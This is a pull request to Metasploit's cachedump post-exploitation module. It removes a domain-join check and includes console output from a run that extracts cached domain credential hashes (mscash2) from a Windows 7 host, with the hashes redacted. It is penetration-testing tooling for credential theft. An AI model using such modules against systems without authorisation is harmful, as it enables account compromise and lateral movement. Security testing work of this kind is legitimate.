### PR TITLE
cachedump - domain joined check

### DIFF
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -296,10 +296,6 @@ class Metasploit3 < Msf::Post
     begin
       print_status("Executing module against #{sysinfo['Computer']}")
       client.railgun.netapi32()
-      if client.railgun.netapi32.NetGetJoinInformation(nil,4,4)["BufferType"] != 3
-        print_error("System is not joined to a domain, exiting..")
-        return
-      end
 
       # Check policy setting for cached creds
       check_gpo


### PR DESCRIPTION
Tested this again a Windows 7 system that was connected to a domain and it worked just fine.

```
[*] Executing module against FOO
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[*] MSCACHE v2 saved in: [redacted]
[*] John the Ripper format:
# mscash2
[redacted]


[*] Post module execution completed
```

Before the PR, it returned the following:

```
[*] Executing module against FOO
[-] System is not joined to a domain, exiting..
[*] Post module execution completed
```
